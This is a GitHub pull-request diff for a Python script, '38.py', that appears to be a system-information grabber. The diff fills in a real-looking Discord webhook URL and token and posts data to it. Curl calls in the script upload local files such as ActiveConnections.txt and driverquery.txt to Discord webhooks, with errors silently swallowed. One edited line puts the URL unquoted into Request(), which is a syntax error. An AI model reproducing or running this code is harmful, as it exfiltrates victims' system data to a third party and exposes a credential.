Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 4 additions & 2 deletions 38.py
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
import json
from urllib.request import Request, urlopen

WEBHOOK_URL = 'WEBHOOK HERE' # PUT WEBHOOK HERE
WEBHOOK_URL = 'https://discord.com/api/webhooks/1416338920907473087/eMm9X2-COmfQyZsgppXkukAMRODoVz1apS4w5UsRL-309eQ40Iz-w7TboOCb9EEa25RS' # PUT WEBHOOK HERE

PING_ME = False

Expand Down Expand Up @@ -62,7 +62,7 @@ def main():
payload = json.dumps({'content': message})

try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
req = Request(https://discord.com/api/webhooks/1416338920907473087/eMm9X2-COmfQyZsgppXkukAMRODoVz1apS4w5UsRL-309eQ40Iz-w7TboOCb9EEa25RS, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
Expand All @@ -79,3 +79,5 @@ def main():
os.system('''curl -i -H 'Expect: application/json' -F file=@Files\ActiveConnections.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
os.system('''curl -i -H 'Expect: application/json' -F file=@Files\driverquery.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
exit()